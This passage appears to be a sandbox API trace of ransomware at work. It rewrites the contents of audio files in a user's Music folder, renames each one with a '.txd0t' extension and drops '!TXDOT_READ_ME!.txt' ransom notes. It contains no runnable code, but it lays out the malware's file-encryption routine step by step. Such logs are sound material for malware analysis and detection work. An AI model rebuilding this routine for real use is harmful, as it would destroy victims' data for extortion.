psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" [0074.903] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3") returned="ZwNcr2UV.mp3" [0074.903] StrCpyW (in: psz1=0xe9b6a6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.903] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt") returned 1 [0074.904] GetProcessHeap () returned 0xe30000 [0074.904] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.904] CloseHandle (hObject=0x468) returned 1 [0074.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\zwncr2uv.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\zwncr2uv.mp3.txd0t")) returned 1 [0074.905] SetEvent (hEvent=0x3f8) returned 1 [0074.905] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.906] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" [0074.906] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t" [0074.906] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t") returned 0 [0074.907] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a", dwFileAttributes=0x80) returned 1 [0074.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\ph7y_8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.907] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=67228) returned 1 [0074.907] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.907] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.908] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffef764, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.908] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x10690, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x10690, lpOverlapped=0x0) returned 1 [0074.909] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffef970, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.909] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x10690, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x10690, lpOverlapped=0x0) returned 1 [0074.910] FlushFileBuffers (hFile=0x468) returned 1 [0074.911] GetProcessHeap () returned 0xe30000 [0074.911] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0074.911] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" [0074.911] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a") returned="Ph7y_8.m4a" [0074.912] StrCpyW (in: psz1=0xe9d79c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.912] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt") returned 0 [0074.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.912] WriteFile (in: hFile=0x460, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0074.913] FlushFileBuffers (hFile=0x460) returned 1 [0074.915] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0074.916] FlushFileBuffers (hFile=0x460) returned 1 [0074.917] CloseHandle (hObject=0x460) returned 1 [0074.917] GetProcessHeap () returned 0xe30000 [0074.917] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.917] CloseHandle (hObject=0x468) returned 1 [0074.920] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\ph7y_8.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\ph7y_8.m4a.txd0t")) returned 1 [0074.920] SetEvent (hEvent=0x3f8) returned 1 [0074.920] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.921] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" [0074.922] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t" [0074.922] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t") returned 0 [0074.922] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a", dwFileAttributes=0x80) returned 1 [0074.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\pq-yxja0.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.922] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=29288) returned 1 [0074.922] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.922] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.923] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff8b98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.923] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x7260, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x7260, lpOverlapped=0x0) returned 1 [0074.924] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff8da0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.924] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x7260, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x7260, lpOverlapped=0x0) returned 1 [0074.924] FlushFileBuffers (hFile=0x468) returned 1 [0074.926] GetProcessHeap () returned 0xe30000 [0074.926] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed28a0 [0074.926] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" [0074.926] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a") returned="Pq-yXja0.m4a" [0074.926] StrCpyW (in: psz1=0xed28ec, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.926] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt") returned 1 [0074.926] GetProcessHeap () returned 0xe30000 [0074.926] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0074.926] CloseHandle (hObject=0x468) returned 1 [0074.928] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\pq-yxja0.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\pq-yxja0.m4a.txd0t")) returned 1 [0074.929] SetEvent (hEvent=0x3f8) returned 1 [0074.929] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.931] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" [0074.931] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t" [0074.931] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned 0 [0074.931] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav", dwFileAttributes=0x80) returned 1 [0074.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\zaydv7kbulcuxsz3kea-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.931] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=78231) returned 1 [0074.931] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.931] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.932] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffecc69, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.932] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x13190, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x13190, lpOverlapped=0x0) returned 1 [0074.934] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffece70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.934] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x13190, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x13190, lpOverlapped=0x0) returned 1 [0074.934] FlushFileBuffers (hFile=0x47c) returned 1 [0074.936] GetProcessHeap () returned 0xe30000 [0074.936] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x124) returned 0xe9b648 [0074.936] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" [0074.936] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav") returned="zaYdv7kbUlcUxSz3KeA-.wav" [0074.936] StrCpyW (in: psz1=0xe9b694, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.936] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt") returned 1 [0074.936] GetProcessHeap () returned 0xe30000 [0074.936] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.936] CloseHandle (hObject=0x47c) returned 1 [0074.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\zaydv7kbulcuxsz3kea-.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\zaydv7kbulcuxsz3kea-.wav.txd0t")) returned 1 [0074.940] SetEvent (hEvent=0x3f8) returned 1 [0074.940] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.942] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" [0074.942] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t" [0074.942] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t") returned 0 [0074.943] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3", dwFileAttributes=0x80) returned 1 [0074.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\fxqdjp18mmdwjvedkw4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.943] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=35749) returned 1 [0074.943] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.943] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.944] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff725b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.944] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x8ba0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x8ba0, lpOverlapped=0x0) returned 1 [0074.945] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff7460, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.945] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x8ba0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x8ba0, lpOverlapped=0x0) returned 1 [0074.945] FlushFileBuffers (hFile=0x468) returned 1 [0074.947] GetProcessHeap () returned 0xe30000 [0074.947] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2f30 [0074.947] StrCpyW (in: psz1=0xed2f30, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" [0074.947] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3") returned="fXQDJP18MMdWjvedkW4.mp3" [0074.947] StrCpyW (in: psz1=0xed2f64, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.947] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt") returned 1 [0074.947] GetProcessHeap () returned 0xe30000 [0074.947] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2f30 | out: hHeap=0xe30000) returned 1 [0074.947] CloseHandle (hObject=0x468) returned 1 [0074.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\fxqdjp18mmdwjvedkw4.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\fxqdjp18mmdwjvedkw4.mp3.txd0t")) returned 1 [0074.949] SetEvent (hEvent=0x3f8) returned 1 [0074.949] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.951] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" [0074.951] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t" [0074.951] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t") returned 0 [0074.951] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3", dwFileAttributes=0x80) returned 1 [0074.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ji_rocyp5iamyiha11bq\\u7kca.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.951] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=31813) returned 1 [0074.951] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.951] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.952] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff81bb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.952] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x7c40, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x7c40, lpOverlapped=0x0) returned 1 [0074.953] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff83c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.953] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x7c40, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x7c40, lpOverlapped=0x0) returned 1 [0074.953] FlushFileBuffers (hFile=0x47c) returned 1 [0074.955] GetProcessHeap () returned 0xe30000 [0074.955] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x118) returned 0xed1330 [0074.955] StrCpyW (in: psz1=0xed1330, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" [0074.955] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3") returned="U7kcA.mp3" [0074.955] StrCpyW (in: psz1=0xed138e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.955] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt") returned 0 [0074.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\ji_rocyp5iamyiha11bq\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0074.956] WriteFile (in: hFile=0x468, lpBuffer=0x37ff464*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x37ff464*, lpNumberOfBytesWritten=0x37ff460*=0x2, lpOverlapped=0x0) returned 1 [0074.957] FlushFileBuffers (hFile=0x468) returned 1 [0074.959] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff460*=0x7f0, lpOverlapped=0x0) returned 1 [0074.966] FlushFileBuffers (hFile=0x468) returned 1 [0074.968] CloseHandle (hObject=0x468) returned 1 